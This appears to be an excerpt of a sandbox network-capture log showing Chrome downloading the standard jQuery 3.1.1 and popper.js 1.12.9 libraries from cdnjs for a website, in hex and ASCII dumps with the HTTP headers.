                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77
                                                                                                    Data Ascii: /*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73
                                                                                                    Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e
                                                                                                    Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e
                                                                                                    Data Ascii: array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61
                                                                                                    Data Ascii: p("^"+K+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+K+"*((?:-\\d)?\\d*)"+K+"*\\)|)(?=[^-]|$)","i")},W=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74
                                                                                                    Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q||!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65
                                                                                                    Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a||b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65
                                                                                                    Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53
                                                                                                    Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"*[*^$|!~]?="),2!==a.queryS
                                                                                                    2025-03-10 12:50:42 UTC1378INData Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e
                                                                                                    Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.2453984104.17.24.144436392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-03-10 12:50:42 UTC692OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Origin: https://kwikkopyegypt.com
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://kwikkopyegypt.com/
                                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-03-10 12:50:42 UTC959INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 10 Mar 2025 12:50:42 GMT
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cf-Ray: 91e2f07808a0124c-ORD
                                                                                                    Server: cloudflare
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                    Etag: W/"5eb03fa9-4af4"
                                                                                                    Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                    Cf-Cdnjs-Via: cfworker/kv
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Timing-Allow-Origin: *
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    Cf-Cache-Status: HIT
                                                                                                    Age: 1403855
                                                                                                    Expires: Sat, 28 Feb 2026 12:50:42 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ea1bqba%2FoDb74SlsnBkYMaR7Td04lck8yUZ5pPQdtSpcbd4C9Ahsub1AQF8cthk0M%2BH9QlIQIMCaeCky6j0F2TCQNv7Mboq8NMlvj9HS3BmMdFu75ThC9Z%2FNTT1IHcHJl1GfNGcW"}],"group":"cf-nel","max_age":604800}
                                                                                                    Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-03-10 12:50:42 UTC410INData Raw: 31 62 66 32 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                    Data Ascii: 1bf2/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27
                                                                                                    Data Ascii: e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document'
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65
                                                                                                    Data Ascii: var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['borde
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e
                                                                                                    Data Ascii: :p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64
                                                                                                    Data Ascii: ht:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.wid
                                                                                                    2025-03-10 12:50:42 UTC1276INData Raw: 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e
                                                                                                    Data Ascii: .warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instan
                                                                                                    2025-03-10 12:50:42 UTC1369INData Raw: 32 66 30 32 0d 0a 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 74 6f 70 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 5b 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 5d 3d 27 27 29 2c 74 68 69 73 2e 64 69 73 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e
                                                                                                    Data Ascii: 2f02this.popper.style.top='',this.popper.style[W('transform')]=''),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function
